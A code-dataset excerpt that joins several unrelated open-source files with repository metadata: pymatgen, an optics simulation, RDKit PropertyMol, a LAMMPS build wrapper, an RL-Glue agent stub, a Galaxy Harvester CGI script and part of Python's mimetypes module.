orb_labs = [
"s",
"p_y",
"p_z",
"p_x",
"d_xy",
"d_yz",
"d_z^2",
"d_xz",
"d_x^2-y^2",
"f_y(3x^2-y^2)",
"f_xyz",
"f_yz^2",
"f_z^3",
"f_xz^2",
"f_z(x^2-y^2)",
"f_x(x^2-3y^2)",
]
try:
orbital = Orbital(orb_labs.index(orb[1:]))
return orbital
except AttributeError:
print("Orb not in list")
return None
|
richardtran415/pymatgen
|
pymatgen/electronic_structure/dos.py
|
Python
|
mit
| 39,371
|
[
"DIRAC",
"Gaussian",
"VASP",
"pymatgen"
] |
effed105ee490215690fa8e71c387eb6c9fca34eb821876444089f6cda5950f9
|
"""This contains classes modelling optical elements such as lenses.
Each optical element has a focal length and width and implements the method
"apply", which enables it to modify an incident wave
Authors:
Adam Rains
"""
from __future__ import division, print_function
import numpy as np
import opticstools as optics_tools
import opticstools.utils as utils
import piaa
class OpticalElement:
"""The base class for all optical elements."""
def __init__(self, focal_length, width):
"""Initialisation for an OpticalElement.
Parameters
----------
focal_length: float
The focal length in mm.
width: float
The width in mm.
"""
self.focal_length = focal_length
self.width = width
def apply(self, input_ef, npix, dx, wavelength_in_mm):
"""Used to modify the incident wave as it passes through the
OpticalElement. The simplest implementation does not modify the incident
wave.
Parameters
----------
input_ef: np.array([[...]...])
2D square incident wave consisting of complex numbers.
npix: int
Size of input_wf per side, preferentially a power of two (npix=2**n)
dx: float
Resolution of the wave in mm/pixel
wavelength_in_mm: float
Wavelength of the wave in mm
Return
------
input_ef: np.array([[...]...])
Unchanged incident wave.
"""
return input_ef
class CircularLens(OpticalElement):
"""A CircularLens OpticalElement - application of a curved wavefront and
circular mask"""
def apply(self, input_ef, npix, dx, wavelength_in_mm):
"""Used to modify the incident wave as it passes through the
CircularLens.
Parameters
----------
input_ef: np.array([[...]...])
2D square incident wave consisting of complex numbers.
npix: int
Size of input_wf per side, preferentially a power of two (npix=2**n)
dx: float
Resolution of the wave in mm/pixel
wavelength_in_mm: float
Wavelength of the wave in mm
Return
------
output_ef: np.array([[...]...])
The modified wave after application of the curved wavefront and
circular mask.
"""
# Apply a circular mask
masked_ef = utils.circle(npix, (self.width / dx)) * input_ef
# Apply the curved wavefront of the lens
curved_wf = optics_tools.curved_wf(npix, dx, self.focal_length,
wavelength_in_mm)
output_ef = masked_ef * curved_wf
return output_ef
class MicrolensArray_3x3(OpticalElement):
"""A 3x3 microlens array OpticalElement - a 3x3 square grid of lenses, each
coming to its own focus.
"""
def apply(self, input_ef, npix, dx, wavelength_in_mm):
"""Applies 3x3 curved wavefronts and square masks to the incident wave.
Parameters
----------
input_ef: np.array([[...]...])
2D square incident wave consisting of complex numbers.
npix: int
Size of input_wf per side, preferentially a power of two (npix=2**n)
dx: float
Resolution of the wave in mm/pixel
wavelength_in_mm: float
Wavelength of the wave in mm
Return
------
output_ef: np.array([[...]...])
The modified wave after application of the 3x3 curved wavefronts and
square mask.
"""
# Initialise the resultant electric field
# (that will be the addition of each of the 9 micro-lenslets)
output_ef = np.zeros((npix, npix))
# Create the square window that will shifted around to represent the
# light getting into each micro-lenslet
square = utils.square(npix, self.width/dx) + 0j
# Starting in the top left, track the window over each row
for x in range(-1,2):
for y in range(-1,2):
# Calculate the base shift (the actual shift requires the -1,
# 0 or 1 multiplier to get direction)
shift = int(self.width/dx)
# Have the window be a curved wavefront and shift as required
curved_wf = optics_tools.curved_wf(npix, dx, self.focal_length,
wavelength_in_mm)
y_shift = np.roll((square*curved_wf), shift*y, axis=1)
xy_shift = np.roll(y_shift, shift*x, axis=0)
# Add the resulting wavefront to a field containing the
# wavefronts of all 9 lenses
output_ef = output_ef + xy_shift * input_ef
return output_ef
def apply_propagate_and_couple(self, input_ef, npix, dx, wavelength_in_mm,
distance_to_fibre, input_field, offset,
fibre_mode, real_offsets=None,
offset_ifu=None, test=False):
"""Applies 3x3 curved wavefronts and square masks to the incident wave.
Parameters
----------
input_ef: np.array([[...]...])
2D square incident wave consisting of complex numbers.
npix: int
Size of input_wf per side, preferentially a power of two (npix=2**n)
dx: float
Resolution of the wave in mm/pixel
wavelength_in_mm: float
Wavelength of the wave in mm
distance_to_fibre: float
The distance to the optical fibre plane from the front of the
microlens array.
input_field: float
Sum of the EF at the telescope pupil (used to calculate the
throughput and any losses)
offset: integer
Number of pixels that the 8 non-central microlenses are offset
radially outwards by at the fibre plane.
fibre_mode: np.array([[...]...])
2D square mode of the optical fibre, constructed from a combination
of Bessel functions
Return
------
output_ef: np.array([[...]...])
The modified wave after application of the 3x3 curved wavefronts and
square mask.
coupling_1_to_9: [float, float, float]
The coupling of the wave at the fibre plane with the fibre mode for
c1 (the central fibre), c5 (the central row and column) and c9
(entire 3x3 array)
aperture_loss_1_to_9
The aperture loss of the wave at the fibre plane with the fibre mode
for a1 (the central fibre), a5 (the central row and column) and a9
(entire 3x3 array)
eta_1_5_9
The efficiency/throughput (eta = coupling * aperture loss) of the
wave at the fibre plane with the fibre mode for a1 (the central
fibre), a5 (the central row and column) and a9 (entire 3x3 array).
"""
npix = int(npix)
# Initialise the resultant electric field (that will be the addition of
# each of the 9 micro-lenslets)
out_ef = np.zeros((npix, npix)) + 0j
# Initialise the displacement of each square from the centre
shift = int(self.width / dx)
# Create the square window that will be used to represent the light
# getting into each micro-lenslet
square = utils.square(npix, self.width/dx) + 0j
curved_square = optics_tools.curved_wf(shift, dx, self.focal_length,
wavelength_in_mm)
# Variable to store the coupling for the central fibre (1), centre and
# horizontal/vertical fibres (5) and all, including diagonals (9)
coupling_1_to_9 = []
aperture_loss_1_to_9 = []
eta_1_5_9 = [0,0,0]
# For each of the 9 microlenses
for x in range(-1,2):
for y in range(-1,2):
# Shift the desired square to the centre
y_shifted_ef = np.roll(input_ef, -shift*y, axis=1)
xy_shifted_ef = np.roll(y_shifted_ef, -shift*x, axis=0)
#--------------------------------------------------------------
# Computing coupling with *real* offsets
#--------------------------------------------------------------
#if type(real_offsets) != None and type(offset_ifu) != None:
if test:
#print "Computing coupling with real fibre offsets"
fibre_num = int(offset_ifu[x+1, y+1])
fibre_x = int(np.round(real_offsets[fibre_num][0]))
fibre_y = int(np.round(real_offsets[fibre_num][2]))
# Positive shift in y (axis 0) is down
# Positive shift in x (axis 1) is right
xy_shifted_ef = np.roll(xy_shifted_ef, -fibre_x, axis=1)
xy_shifted_ef = np.roll(xy_shifted_ef, -fibre_y, axis=0)
#import pdb
#pdb.set_trace()
#--------------------------------------------------------------
# Apply the window and curved wavefront
sub_ef = xy_shifted_ef[(npix//2 - shift//2):(npix//2 + shift//2),
(npix//2 - shift//2):(npix//2 + shift//2)]
curved_ef = curved_square * sub_ef
# Propagate the light passing through the microlens to the fibre
ef_at_fibre = optics_tools.propagate_by_fresnel(curved_ef, dx,
distance_to_fibre,
wavelength_in_mm)
# Add the resulting wavefront to a field containing the
# wavefronts of all 9 lenses
side = int(npix/2 - 1.5*shift)
out_ef[(side + shift*(x+1)):(side + shift*(x+2)),
(side + shift*(y+1)):(side + shift*(y+2))] = ef_at_fibre
# Compute the coupling, applying an offset to the fibre mode as
# required (To account for the outer fibres being off centre and
# displaced outwards)
coupling = optics_tools.compute_coupling(npix, dx, ef_at_fibre,
self.width, fibre_mode,
-offset*x, -offset*y)
coupling_1_to_9.append(coupling)
# [11] - Compute aperture loss and eta
# Calculate aperture loss for the microlens by calculating the
# light that gets into the fibre (use a circular mask)
aperture_loss_fibre = np.sum(np.abs(ef_at_fibre)**2)/input_field
aperture_loss_1_to_9.append(aperture_loss_fibre)
# Calculate and combine the eta for each set of lenses (1, 5, 9)
# 1 Fibre
if (x == 0) and (y == 0):
eta_1_5_9[0] += coupling * aperture_loss_fibre
# 5 Fibres
if not ((np.abs(x) == 1) and (np.abs(y) == 1)):
eta_1_5_9[1] += coupling * aperture_loss_fibre
# 9 Fibres
eta_1_5_9[2] += coupling * aperture_loss_fibre
return out_ef, coupling_1_to_9, aperture_loss_1_to_9, eta_1_5_9
class PIAAOptics(OpticalElement):
"""A set of PIAAOptics as an OpticalElement - two lenses separated by a
known difference. Implements functions in piaa.py."""
def __init__(self, alpha, r0, frac_to_focus, n_med, thickness, radius_in_mm,
real_heights, dx, npix, wavelength_in_mm):
"""Generates the phase aberrations introduced by each of a pair of PIAA
lenses given the relevant parameters.
Parameters
----------
alpha: float
In the formula for I_1 - the exponent of the Gaussian intensity.
r0: float
The fractional radius of the telescope secondary obstruction in the
annulus. e.g. for a 40% obstruction, this would be 0.4.
frac_to_focus: float
The fraction (2nd surface z coord - 1st surface z coord)/
(focus z coord - 1st surface z coord)
delta: float
As the slope can not be infinite... delta describes
the radius of the annular dead zone in the second pupil.
dt: float
Step size for integration.
n_med: float
Refractive index of the medium. Used to compensate for the glass and
give extra power to the new optic as well as to estimate the height.
thickness: float
Physical thickness/distance between the realised PIAA lenses
radius_in_mm: float
Physical radius for realised PIAA lens
real_heights: Boolean
Does nothing at present...
dx: float
Resolution/sampling in um/pixel
npix: int
The number of pixels.
wavelength_in_mm: float
The wavelength of the light in mm.
"""
# Store parameters
self.alpha = alpha
self.r0 = r0
self.frac_to_focus = frac_to_focus
self.n_med = n_med
self.thickness = thickness
self.radius_in_mm = radius_in_mm
self.real_heights = real_heights
self.dx = dx
self.npix = npix
self.wavelength_in_mm = wavelength_in_mm
# Generate PIAA lenses #1 and #2
self.piaa_lens1, self.piaa_lens2 = piaa.create_piaa_lenses(self.alpha,
self.r0, self.frac_to_focus,
self.n_med, self.thickness,
self.radius_in_mm, self.real_heights,
self.dx, self.npix,
self.wavelength_in_mm)
def apply(self, input_ef):
"""Applies the first PIAA lens to the incident wave, propagates the
result to the second PIAA lens before applying it too.
Parameters
----------
input_ef: np.array([[...]...])
2D square incident wave consisting of complex numbers.
Return
------
output_ef: np.array([[...]...])
The modified wave after application of the PIAA optics
"""
# Pass the electric field through the first PIAA lens
ef_1 = input_ef * np.exp(1j * self.piaa_lens1)
# Propagate the electric field through glass to the second lens
ef_2 = optics_tools.propagate_by_fresnel(ef_1, self.dx,
self.thickness / self.n_med,
self.wavelength_in_mm)
# Pass the electric field through the second PIAA lens
output_ef = ef_2 * np.exp(1j * self.piaa_lens2)
return output_ef
|
mikeireland/astro-optics
|
optics.py
|
Python
|
mit
| 15,640
|
[
"Gaussian"
] |
714a3e7f1b2d61c308b2ddc6b4261947f3f4eada72798a0fcb202e2e30d73614
|
# $Id$
#
# Copyright (C) 2007-2010 Greg Landrum
# All Rights Reserved
#
from rdkit import Chem
class PropertyMol(Chem.Mol):
""" allows rdkit molecules to be pickled with their properties saved.
>>> import cPickle
>>> m = Chem.MolFromMolFile('test_data/benzene.mol')
>>> m.GetProp('_Name')
'benzene.mol'
by default pickling removes properties:
>>> m2 = cPickle.loads(cPickle.dumps(m))
>>> m2.HasProp('_Name')
0
Property mols solve this:
>>> pm = PropertyMol(m)
>>> pm.GetProp('_Name')
'benzene.mol'
>>> pm.SetProp('MyProp','foo')
>>> pm.HasProp('MyProp')
1
>>> pm2 = cPickle.loads(cPickle.dumps(pm))
>>> Chem.MolToSmiles(pm2)
'c1ccccc1'
>>> pm2.GetProp('_Name')
'benzene.mol'
>>> pm2.HasProp('MyProp')
1
>>> pm2.GetProp('MyProp')
'foo'
>>> pm2.HasProp('MissingProp')
0
Property mols are a bit more permissive about the types
of property values:
>>> pm.SetProp('IntVal',1)
That wouldn't work with a standard mol:
>>> m.SetProp('IntVal',1)
Traceback (most recent call last):
...
ArgumentError: Python argument types in
Mol.SetProp(Mol, str, int)
did not match C++ signature:
...
but the Property mols still convert all values to strings before storing:
>>> pm.GetProp('IntVal')
'1'
This is a test for sf.net issue 2880943: make sure properties end up in SD files:
>>> import tempfile,os
>>> fn = tempfile.mktemp('.sdf')
>>> w = Chem.SDWriter(fn)
>>> w.write(pm)
>>> w=None
>>> txt = file(fn,'r').read()
>>> '<IntVal>' in txt
True
>>> try:
... os.unlink(fn)
... except:
... pass
The next level of that bug: does writing a *depickled* propertymol
to an SD file include properties:
>>> fn = tempfile.mktemp('.sdf')
>>> w = Chem.SDWriter(fn)
>>> pm = cPickle.loads(cPickle.dumps(pm))
>>> w.write(pm)
>>> w=None
>>> txt = file(fn,'r').read()
>>> '<IntVal>' in txt
True
>>> try:
... os.unlink(fn)
... except:
... pass
"""
__getstate_manages_dict__=True
def __init__(self,mol):
if not isinstance(mol,Chem.Mol): return
Chem.Mol.__init__(self,mol.ToBinary())
for pn in mol.GetPropNames(includePrivate=True):
self.SetProp(pn,mol.GetProp(pn))
def SetProp(self,nm,val):
Chem.Mol.SetProp(self,nm,str(val))
def __getstate__(self):
pDict={}
for pn in self.GetPropNames(includePrivate=True):
pDict[pn] = self.GetProp(pn)
return {'pkl':self.ToBinary(),
'propD':pDict}
def __setstate__(self,stateD):
Chem.Mol.__init__(self,stateD['pkl'])
for prop,val in stateD['propD'].iteritems():
self.SetProp(prop,val)
#------------------------------------
#
# doctest boilerplate
#
def _test():
import doctest,sys
return doctest.testmod(sys.modules["__main__"],optionflags=doctest.ELLIPSIS)
if __name__ == '__main__':
import sys
failed,tried = _test()
sys.exit(failed)
|
rdkit/rdkit-orig
|
rdkit/Chem/PropertyMol.py
|
Python
|
bsd-3-clause
| 2,973
|
[
"RDKit"
] |
fb0e754af5d720da2a522804601c9ec62100c9edf9a4eacf29596204bbbf67a4
|
#!/usr/bin/env python
"""
Install.py tool to do a generic build of a library
soft linked to by many of the lib/Install.py files
used to automate the steps described in the corresponding lib/README
"""
from __future__ import print_function
import sys, os, subprocess
from argparse import ArgumentParser
sys.path.append('..')
from install_helpers import get_cpus, fullpath
parser = ArgumentParser(prog='Install.py',
description="LAMMPS library build wrapper script")
HELP = """
Syntax from src dir: make lib-libname args="-m machine -e suffix"
Syntax from lib dir: python Install.py -m machine -e suffix
libname = name of lib dir (e.g. atc, h5md, meam, poems, etc)
specify -m and optionally -e, order does not matter
Examples:
make lib-poems args="-m serial" # build POEMS lib with same settings as in the serial Makefile in src
make lib-colvars args="-m mpi" # build USER-COLVARS lib with same settings as in the mpi Makefile in src
make lib-meam args="-m ifort" # build MEAM lib with custom Makefile.ifort (using Intel Fortran)
"""
# parse and process arguments
parser.add_argument("-m", "--machine",
help="suffix of a <libname>/Makefile.* file used for compiling this library")
parser.add_argument("-e", "--extramake",
help="set EXTRAMAKE variable in <libname>/Makefile.<machine> to Makefile.lammps.<extramake>")
args = parser.parse_args()
# print help message and exit, if neither build nor path options are given
if not args.machine and not args.extramake:
parser.print_help()
sys.exit(HELP)
machine = args.machine
extraflag = not args.extramake
suffix = args.extramake
# set lib from working dir
cwd = fullpath('.')
lib = os.path.basename(cwd)
# create Makefile.auto as copy of Makefile.machine
# reset EXTRAMAKE if requested
if not os.path.exists("Makefile.%s" % machine):
sys.exit("lib/%s/Makefile.%s does not exist" % (lib, machine))
lines = open("Makefile.%s" % machine, 'r').readlines()
fp = open("Makefile.auto", 'w')
has_extramake = False
for line in lines:
words = line.split()
if len(words) == 3 and words[0] == "EXTRAMAKE" and words[1] == '=':
has_extramake = True
if extraflag:
line = line.replace(words[2], "Makefile.lammps.%s" % suffix)
fp.write(line)
fp.close()
# make the library via Makefile.auto optionally with parallel make
n_cpus = get_cpus()
print("Building lib%s.a ..." % lib)
cmd = "make -f Makefile.auto clean; make -f Makefile.auto -j%d" % n_cpus
try:
txt = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
print(txt.decode('UTF-8'))
except subprocess.CalledProcessError as e:
print("Make failed with:\n %s" % e.output.decode('UTF-8'))
sys.exit(1)
if os.path.exists("lib%s.a" % lib):
print("Build was successful")
else:
sys.exit("Build of lib/%s/lib%s.a was NOT successful" % (lib, lib))
if has_extramake and not os.path.exists("Makefile.lammps"):
print("WARNING: lib/%s/Makefile.lammps was NOT created" % lib)
|
Pakketeretet2/lammps
|
lib/Install.py
|
Python
|
gpl-2.0
| 2,989
|
[
"LAMMPS"
] |
e656cbc92acf1f9f8c72696fe2c9672132bdfc9335f759eb8dfa4339f1b75032
|
#
# Copyright (C) 2007, Mark Lee
#
#http://rl-glue-ext.googlecode.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# $Revision: 446 $
# $Date: 2009-01-22 20:20:21 -0700 (Thu, 22 Jan 2009) $
# $Author: brian@tannerpages.com $
# $HeadURL: http://rl-glue-ext.googlecode.com/svn/trunk/projects/codecs/Python/src/rlglue/agent/Agent.py $
from rlglue.types import Action
from rlglue.types import Observation
# BEGIN: change made by: Akshay Narayan (06-01-2015:1022)
from rlglue.types import Reward
# END: change made by: Akshay Narayan (06-01-2015:1022)
class Agent:
# (string) -> void
def agent_init(taskSpecification):
pass
# (Observation) -> Action
def agent_start(observation):
pass
# BEGIN: change made by: Akshay Narayan (06-01-2015:1023)
## (double, Observation) -> Action
# (Reward, Observation) -> Action
# END: change made by: Akshay Narayan (06-01-2015:1023)
def agent_step(reward, observation):
pass
# BEGIN: change made by: Akshay Narayan (06-01-2015:1023)
## (double) -> void
# (Reward) -> void
# END: change made by: Akshay Narayan (06-01-2015:1023)
def agent_end(reward):
pass
# () -> void
def agent_cleanup():
pass
# (string) -> string
def agent_message(message):
pass
|
okkhoy/mo-rlglue-python-codec
|
rlglue/agent/Agent.py
|
Python
|
mit
| 1,727
|
[
"Brian"
] |
73d8c1785a771b47ac650af7350e99fb7741e555fb88b4a1aafdfc8505f1be5e
|
#!/usr/bin/env python3
"""
Copyright 2020 Paul Willworth <ioscode@gmail.com>
This file is part of Galaxy Harvester.
Galaxy Harvester is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Galaxy Harvester is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with Galaxy Harvester. If not, see <http://www.gnu.org/licenses/>.
"""
import cgi
import pymysql
import dbShared
#
form = cgi.FieldStorage()
resCategory = form.getfirst('resCategory', '')
outType = form.getfirst('outType', '')
# escape input to prevent sql injection
resCategory = dbShared.dbInsertSafe(resCategory)
outType = dbShared.dbInsertSafe(outType)
print('Content-type: text/html\n')
if outType == 'links':
print('<ul class="plain">')
elif outType == 'graphic':
print('')
else:
print('<option value="none" title="p00000000000">None</option>')
if len(resCategory) > 0:
joinStr = ' INNER JOIN (SELECT resourceGroup FROM tResourceGroupCategory WHERE resourceCategory = "' + resCategory + '") rgc ON tResourceGroup.resourceGroup = rgc.resourceGroup'
else:
joinStr = ''
conn = dbShared.ghConn()
cursor = conn.cursor()
if (cursor):
cursor.execute('SELECT tResourceGroup.resourceGroup, groupName, CONCAT("p", CASE WHEN Max(CRmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(CDmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(DRmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(FLmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(HRmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(MAmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(PEmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(OQmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(SRmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(UTmax)>0 THEN "1" ELSE "0" END, CASE WHEN Max(ERmax)>0 THEN "1" ELSE "0" END) AS statMask, tResourceGroup.containerType FROM tResourceGroup' + joinStr + ' LEFT JOIN tResourceTypeGroup ON tResourceGroup.resourceGroup = tResourceTypeGroup.resourceGroup LEFT JOIN tResourceType ON tResourceTypeGroup.resourceType = tResourceType.resourceType WHERE enterable>0 GROUP BY tResourceGroup.resourceGroup ORDER BY groupName;')
row = cursor.fetchone()
while (row != None):
if outType == 'links':
print('<li><a href="/resourceType.py/' + row[0] + '">' + row[1] + '</a></li>')
elif outType == 'graphic':
print("<div id='resInventory{0}' class='inventoryItem inlineBlock' style='background-image:url(/images/resources/{2}.png);background-size:64px 64px;' tag='{1}'>".format(row[0], row[2], row[3]))
print("<div style='position: absolute;bottom:0;width:100%'>{0}</div>".format(row[1]))
print("</div>")
else:
print('<option value="'+str(row[0])+'" title="'+row[2]+'">'+row[1]+'</option>')
row = cursor.fetchone()
if outType == 'links':
print('</ul>')
|
pwillworth/galaxyharvester
|
html/getResourceGroupList.py
|
Python
|
gpl-3.0
| 3,121
|
[
"Galaxy"
] |
ebcccff6b47a27935b8f9a43edd0f21869effc7dc4c79024d2dd429d6f38629a
|
"""Guess the MIME type of a file.
This module defines two useful functions:
guess_type(url, strict=True) -- guess the MIME type and encoding of a URL.
guess_extension(type, strict=True) -- guess the extension for a given MIME type.
It also contains the following, for tuning the behavior:
Data:
knownfiles -- list of files to parse
inited -- flag set when init() has been called
suffix_map -- dictionary mapping suffixes to suffixes
encodings_map -- dictionary mapping suffixes to encodings
types_map -- dictionary mapping suffixes to types
Functions:
init([files]) -- parse a list of files, default knownfiles (on Windows, the
default values are taken from the registry)
read_mime_types(file) -- parse one file, return a dictionary or None
"""
import os
import sys
import posixpath
import urllib.parse
try:
import winreg as _winreg
except ImportError:
_winreg = None
__all__ = [
"guess_type","guess_extension","guess_all_extensions",
"add_type","read_mime_types","init"
]
knownfiles = [
"/etc/mime.types",
"/etc/httpd/mime.types", # Mac OS X
"/etc/httpd/conf/mime.types", # Apache
"/etc/apache/mime.types", # Apache 1
"/etc/apache2/mime.types", # Apache 2
"/usr/local/etc/httpd/conf/mime.types",
"/usr/local/lib/netscape/mime.types",
"/usr/local/etc/httpd/conf/mime.types", # Apache 1.2
"/usr/local/etc/mime.types", # Apache 1.3
]
inited = False
_db = None
class MimeTypes:
"""MIME-types datastore.
This datastore can handle information from mime.types-style files
and supports basic determination of MIME type from a filename or
URL, and can guess a reasonable extension given a MIME type.
"""
def __init__(self, filenames=(), strict=True):
if not inited:
init()
self.encodings_map = encodings_map.copy()
self.suffix_map = suffix_map.copy()
self.types_map = ({}, {}) # dict for (non-strict, strict)
self.types_map_inv = ({}, {})
for (ext, type) in types_map.items():
self.add_type(type, ext, True)
for (ext, type) in common_types.items():
self.add_type(type, ext, False)
for name in filenames:
self.read(name, strict)
def add_type(self, type, ext, strict=True):
"""Add a mapping between a type and an extension.
When the extension is already known, the new
type will replace the old one. When the type
is already known the extension will be added
to the list of known extensions.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
self.types_map[strict][ext] = type
exts = self.types_map_inv[strict].setdefault(type, [])
if ext not in exts:
exts.append(ext)
def guess_type(self, url, strict=True):
"""Guess the type of a file based on its URL.
Return value is a tuple (type, encoding) where type is None if
the type can't be guessed (no or unknown suffix) or a string
of the form type/subtype, usable for a MIME Content-type
header; and encoding is None for no encoding or the name of
the program used to encode (e.g. compress or gzip). The
mappings are table driven. Encoding suffixes are case
sensitive; type suffixes are first tried case sensitive, then
case insensitive.
The suffixes .tgz, .taz and .tz (case sensitive!) are all
mapped to '.tar.gz'. (This is table-driven too, using the
dictionary suffix_map.)
Optional `strict' argument when False adds a bunch of commonly found,
but non-standard types.
"""
scheme, url = urllib.parse.splittype(url)
if scheme == 'data':
# syntax of data URLs:
# dataurl := "data:" [ mediatype ] [ ";base64" ] "," data
# mediatype := [ type "/" subtype ] *( ";" parameter )
# data := *urlchar
# parameter := attribute "=" value
# type/subtype defaults to "text/plain"
comma = url.find(',')
if comma < 0:
# bad data URL
return None, None
semi = url.find(';', 0, comma)
if semi >= 0:
type = url[:semi]
else:
type = url[:comma]
if '=' in type or '/' not in type:
type = 'text/plain'
return type, None # never compressed, so encoding is None
base, ext = posixpath.splitext(url)
while ext in self.suffix_map:
base, ext = posixpath.splitext(base + self.suffix_map[ext])
if ext in self.encodings_map:
encoding = self.encodings_map[ext]
base, ext = posixpath.splitext(base)
else:
encoding = None
types_map = self.types_map[True]
if ext in types_map:
return types_map[ext], encoding
elif ext.lower() in types_map:
return types_map[ext.lower()], encoding
elif strict:
return None, encoding
types_map = self.types_map[False]
if ext in types_map:
return types_map[ext], encoding
elif ext.lower() in types_map:
return types_map[ext.lower()], encoding
else:
return None, encoding
def guess_all_extensions(self, type, strict=True):
"""Guess the extensions for a file based on its MIME type.
Return value is a list of strings giving the possible filename
extensions, including the leading dot ('.'). The extension is not
guaranteed to have been associated with any particular data stream,
but would be mapped to the MIME type `type' by guess_type().
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
type = type.lower()
extensions = self.types_map_inv[True].get(type, [])
if not strict:
for ext in self.types_map_inv[False].get(type, []):
if ext not in extensions:
extensions.append(ext)
return extensions
def guess_extension(self, type, strict=True):
"""Guess the extension for a file based on its MIME type.
Return value is a string giving a filename extension,
including the leading dot ('.'). The extension is not
guaranteed to have been associated with any particular data
stream, but would be mapped to the MIME type `type' by
guess_type(). If no extension can be guessed for `type', None
is returned.
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
extensions = self.guess_all_extensions(type, strict)
if not extensions:
return None
return extensions[0]
def read(self, filename, strict=True):
"""
Read a single mime.types-format file, specified by pathname.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
with open(filename) as fp:
self.readfp(fp, strict)
def readfp(self, fp, strict=True):
"""
Read a single mime.types-format file.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
while 1:
line = fp.readline()
if not line:
break
words = line.split()
for i in range(len(words)):
if words[i][0] == '#':
del words[i:]
break
if not words:
continue
type, suffixes = words[0], words[1:]
for suff in suffixes:
self.add_type(type, '.' + suff, strict)
def read_windows_registry(self, strict=True):
"""
Load the MIME types database from Windows registry.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
# Windows only
if not _winreg:
return
def enum_types(mimedb):
i = 0
while True:
try:
ctype = _winreg.EnumKey(mimedb, i)
except EnvironmentError:
break
else:
yield ctype
i += 1
default_encoding = sys.getdefaultencoding()
with _winreg.OpenKey(_winreg.HKEY_CLASSES_ROOT,
r'MIME\Database\Content Type') as mimedb:
for ctype in enum_types(mimedb):
try:
with _winreg.OpenKey(mimedb, ctype) as key:
suffix, datatype = _winreg.QueryValueEx(key,
'Extension')
except EnvironmentError:
continue
if datatype != _winreg.REG_SZ:
continue
self.add_type(ctype, suffix, strict)
def guess_type(url, strict=True):
"""Guess the type of a file based on its URL.
Return value is a tuple (type, encoding) where type is None if the
type can't be guessed (no or unknown suffix) or a string of the
form type/subtype, usable for a MIME Content-type header; and
encoding is None for no encoding or the name of the program used
to encode (e.g. compress or gzip). The mappings are table
driven. Encoding suffixes are case sensitive; type suffixes are
first tried case sensitive, then case insensitive.
The suffixes .tgz, .taz and .tz (case sensitive!) are all mapped
to ".tar.gz". (This is table-driven too, using the dictionary
suffix_map).
Optional `strict' argument when false adds a bunch of commonly found, but
non-standard types.
"""
if _db is None:
init()
return _db.guess_type(url, strict)
def guess_all_extensions(type, strict=True):
"""Guess the extensions for a file based on its MIME type.
Return value is a list of strings giving the possible filename
extensions, including the leading dot ('.'). The extension is not
guaranteed to have been associated with any particular data
stream, but would be mapped to the MIME type `type' by
guess_type(). If no extension can be guessed for `type', None
is returned.
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
if _db is None:
init()
return _db.guess_all_extensions(type, strict)
def guess_extension(type, strict=True):
"""Guess the extension for a file based on its MIME type.
Return value is a string giving a filename extension, including the
leading dot ('.'). The extension is not guaranteed to have been
associated with any particular data stream, but would be mapped to the
MIME type `type' by guess_type(). If no extension can be guessed for
`type', None is returned.
Optional `strict' argument when false adds a bunch of commonly found,
but non-standard types.
"""
if _db is None:
init()
return _db.guess_extension(type, strict)
def add_type(type, ext, strict=True):
"""Add a mapping between a type and an extension.
When the extension is already known, the new
type will replace the old one. When the type
is already known the extension will be added
to the list of known extensions.
If strict is true, information will be added to
list of standard types, else to the list of non-standard
types.
"""
if _db is None:
init()
return _db.add_type(type, ext, strict)
def init(files=None):
global suffix_map, types_map, encodings_map, common_types
global inited, _db
inited = True # so that MimeTypes.__init__() doesn't call us again
db = MimeTypes()
if files is None:
if _winreg:
db.read_windows_registry()
files = knownfiles
for file in files:
if os.path.isfile(file):
db.read(file)
encodings_map = db.encodings_map
suffix_map = db.suffix_map
types_map = db.types_map[True]
common_types = db.types_map[False]
# Make the DB a global variable now that it is fully initialized
_db = db
def read_mime_types(file):
try:
f = open(file)
except IOError:
return None
db = MimeTypes()
db.readfp(f, True)
return db.types_map[True]
def _default_mime_types():
global suffix_map
global encodings_map
global types_map
global common_types
suffix_map = {
'.svgz': '.svg.gz',
'.tgz': '.tar.gz',
'.taz': '.tar.gz',
'.tz': '.tar.gz',
'.tbz2': '.tar.bz2',
}
encodings_map = {
'.gz': 'gzip',
'.Z': 'compress',
'.bz2': 'bzip2',
}
# Before adding new types, make sure they are either registered with IANA,
# at http://www.iana.org/assignments/media-types
# or extensions, i.e. using the x- prefix
# If you add to these, please keep them sorted!
types_map = {
'.a' : 'application/octet-stream',
'.ai' : 'application/postscript',
'.aif' : 'audio/x-aiff',
'.aifc' : 'audio/x-aiff',
'.aiff' : 'audio/x-aiff',
'.au' : 'audio/basic',
'.avi' : 'video/x-msvideo',
'.bat' : 'text/plain',
'.bcpio' : 'application/x-bcpio',
'.bin' : 'application/octet-stream',
'.bmp' : 'image/x-ms-bmp',
'.c' : 'text/plain',
